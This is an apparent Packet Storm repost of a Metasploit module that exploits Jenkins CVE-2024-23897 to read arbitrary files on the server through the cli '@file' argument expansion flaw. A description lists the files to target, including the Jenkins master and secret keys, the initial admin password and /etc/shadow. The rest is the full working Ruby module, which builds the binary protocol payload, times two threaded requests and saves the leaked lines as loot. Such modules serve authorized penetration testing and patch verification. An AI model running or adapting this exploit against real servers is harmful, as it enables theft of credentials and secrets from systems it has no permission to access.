This Metasploit module utilizes the Jenkins cli protocol to run the help command. The cli is accessible with read-only permissions by default, which are all thats required. Jenkins cli utilizes args4js parseArgument, which calls expandAtFiles to replace any @<filename> with the contents of a file. We are then able to retrieve the error message to read up to the first two lines of a file. Exploitation by hand can be done with the cli, see markdown documents for additional instructions. There are a few exploitation oddities: 1. The injection point for the help command requires 2 input arguments. When the expandAtFiles is called, each line of the FILE_PATH becomes an input argument. If a file only contains one line, it will throw an error: ERROR: You must authenticate to access this Jenkins. However, we can pad out the content by supplying a first argument. 2. There is a strange timing requirement where the download (or first) request must get to the server first, but the upload (or second) request must be very close behind it. From testing against the docker image, it was found values between .01 and 1.9 were viable. Due to the round trip time of the first request and response happening before request 2 would be received, it is necessary to use threading to ensure the requests happen within rapid succession. Files of value: * /var/jenkins_home/secret.key * /var/jenkins_home/secrets/master.key * /var/jenkins_home/secrets/initialAdminPassword * /etc/passwd * /etc/shadow * Project secrets and credentials * Source code, build artifacts.
8799f2e8f0af3fd5eaa3690edb0e303a727a1d5ed7c421cade67b080436d71e9##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Jenkins
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Jenkins cli Ampersand Replacement Arbitrary File Read',
'Description' => %q{
This module utilizes the Jenkins cli protocol to run the `help` command.
The cli is accessible with read-only permissions by default, which are
all thats required.
Jenkins cli utilizes `args4j's` `parseArgument`, which calls `expandAtFiles` to
replace any `@<filename>` with the contents of a file. We are then able to retrieve
the error message to read up to the first two lines of a file.
Exploitation by hand can be done with the cli, see markdown documents for additional
instructions.
There are a few exploitation oddities:
1. The injection point for the `help` command requires 2 input arguments.
When the `expandAtFiles` is called, each line of the `FILE_PATH` becomes an input argument.
If a file only contains one line, it will throw an error: `ERROR: You must authenticate to access this Jenkins.`
However, we can pad out the content by supplying a first argument.
2. There is a strange timing requirement where the `download` (or first) request must get
to the server first, but the `upload` (or second) request must be very close behind it.
From testing against the docker image, it was found values between `.01` and `1.9` were
viable. Due to the round trip time of the first request and response happening before
request 2 would be received, it is necessary to use threading to ensure the requests
happen within rapid succession.
Files of value:
* /var/jenkins_home/secret.key
* /var/jenkins_home/secrets/master.key
* /var/jenkins_home/secrets/initialAdminPassword
* /etc/passwd
* /etc/shadow
* Project secrets and credentials
* Source code, build artifacts
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'Yaniv Nizry', # discovery
'binganao', # poc
'h4x0r-dz', # poc
'Vozec' # poc
],
'References' => [
[ 'URL', 'https://www.jenkins.io/security/advisory/2024-01-24/'],
[ 'URL', 'https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/'],
[ 'URL', 'https://github.com/binganao/CVE-2024-23897'],
[ 'URL', 'https://github.com/h4x0r-dz/CVE-2024-23897'],
[ 'URL', 'https://github.com/Vozec/CVE-2024-23897'],
[ 'CVE', '2024-23897']
],
'Targets' => [
[ 'Automatic Target', {}]
],
'DisclosureDate' => '2024-01-24',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ ],
'SideEffects' => [ ]
},
'DefaultOptions' => {
'RPORT' => 8080,
'HttpClientTimeout' => 3 # very quick response, so set this low
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path for Jenkins', '/']),
OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']),
]
)
register_advanced_options(
[
OptFloat.new('DELAY', [true, 'Delay between first and second request', 0.5]),
OptString.new('ENCODING', [true, 'Encoding to use for reading the file', 'UTF-8']),
OptString.new('LOCALITY', [true, 'Locality to use for reading the file', 'en_US'])
]
)
end
def check
version = jenkins_version
return Exploit::CheckCode::Safe('Unable to determine Jenkins version number') if version.blank?
version = Rex::Version.new(version)
if version <= Rex::Version.new('2.426.2') || # LTS check
(version >= Rex::Version.new('2.427') && version <= Rex::Version.new('2.441')) # non-lts
return Exploit::CheckCode::Appears("Found exploitable version: #{version}")
end
Exploit::CheckCode::Safe("Found non-exploitable version: #{version}")
end
def request_header
"\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00"
end
def request_footer
data = []
data << "\x00\x00\x00\x07\x02\x00"
data << [datastore['ENCODING'].length].pack('C') # length of encoding string
data << datastore['ENCODING']
data << "\x00\x00\x00\x07\x01\x00"
data << [datastore['LOCALITY'].length].pack('C') # length of locality string
data << datastore['LOCALITY']
data << "\x00\x00\x00\x00\x03"
data
end
def parameter_one
# a literal parameter of 1
"\x03\x00\x00\x01\x31\x00\x00\x00"
end
def data_generator(pad: false)
data = []
data << request_header
data << parameter_one if pad
data << [datastore['FILE_PATH'].length + 3].pack('C').to_s
data << "\x00\x00"
data << [datastore['FILE_PATH'].length + 1].pack('C').to_s
data << "\x40"
data << datastore['FILE_PATH']
data << request_footer
data.join('')
end
def upload_request(uuid, multi_line_file: true)
# send upload request asking for file
# In testing against Docker image on localhost, .01 seems to be the magic to get the download request to hit very slightly ahead of the upload request
# which is required for successful exploitation
sleep(datastore['DELAY'])
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'cli'),
'method' => 'POST',
'keep_cookies' => true,
'ctype' => 'application/octet-stream',
'headers' => {
'Session' => uuid,
'Side' => 'upload'
},
'vars_get' => {
'remoting' => 'false'
},
'data' => data_generator(pad: multi_line_file)
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid server reply to upload request (response code: #{res.code})") unless res.code == 200
# we don't get a response here, so we just need the request to go through and 200 us
end
def process_result(use_pad)
# the output comes back as follows:
# ERROR: Too many arguments: <line 2>
# java -jar jenkins-cli.jar help
# [COMMAND]
# Lists all the available commands or a detailed description of single command.
# COMMAND : Name of the command (default: <line 1>)
# The main thing here is we get the first 2 lines of output from the file.
# The 2nd line from the file is returned on line 1 of the output, and line
# 1 from the file is returned on the last line of output. If padding was used
# then <line 1> will just be a literal 1
file_contents = []
@content_body.split("\n").each do |html_response_line|
# filter for the two lines which have output
if html_response_line.include? 'ERROR: Too many arguments'
file_contents << html_response_line.gsub('ERROR: Too many arguments: ', '').strip
elsif html_response_line.include? 'COMMAND : Name of the command (default:'
temp = html_response_line.gsub(' COMMAND : Name of the command (default: ', '')
temp = temp.chomp(')').strip
file_contents.insert(0, temp)
end
end
return if file_contents.empty?
# if we padded out, then our first line is 1, so drop that
file_contents = file_contents.drop(1) if use_pad == true
print_good("#{datastore['FILE_PATH']} file contents retrieved (first line or 2):\n#{file_contents.join("\n")}")
stored_path = store_loot('jenkins.file', 'text/plain', rhost, file_contents.join("\n"), datastore['FILE_PATH'])
print_good("Results saved to: #{stored_path}")
end
def download_request(uuid)
# send download request
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'cli'),
'method' => 'POST',
'keep_cookies' => true,
'headers' => {
'Session' => uuid,
'Side' => 'download'
},
'vars_get' => {
'remoting' => 'false'
}
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid server reply to download request (response code: #{res.code})") unless res.code == 200
@content_body = res.body
end
def run
uuid = SecureRandom.uuid
print_status("Sending requests with UUID: #{uuid}")
# Looking over the python PoCs, they all include threading however
# the writeup, and PoCs don't mention a timing component.
# However, during testing it was found that the two requests need to
# hit the server nearly simultaneously, with the 'download' one hitting
# first. During testing, even a .1 second slowdown was too much and
# the server resulted in a 500 error. So we need to thread these to
# execute them fast enough that the server gets both in rapid succession
use_pad = false
threads = []
threads << framework.threads.spawn('CVE-2024-23897', false) do
upload_request(uuid, multi_line_file: use_pad) # try single line file first since we get an error if we have more content to get
end
threads << framework.threads.spawn('CVE-2024-23897', false) do
download_request(uuid)
end
threads.map do |t|
t.join
rescue StandardError
nil
end
# we got an error that means we need to pad out our value, so rerun with pad
if @content_body && @content_body.include?('ERROR: You must authenticate to access this Jenkins.')
print_status('Re-attempting with padding for single line output file')
use_pad = true
threads = []
threads << framework.threads.spawn('CVE-2024-23897-upload', false) do
upload_request(uuid, multi_line_file: use_pad)
end
threads << framework.threads.spawn('CVE-2024-23897-download', false) do
download_request(uuid)
end
threads.map do |t|
t.join
rescue StandardError
nil
end
end
if @content_body
process_result(use_pad)
else
print_bad('Exploit failed, no exploit data was successfully returned')
end
end
end
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed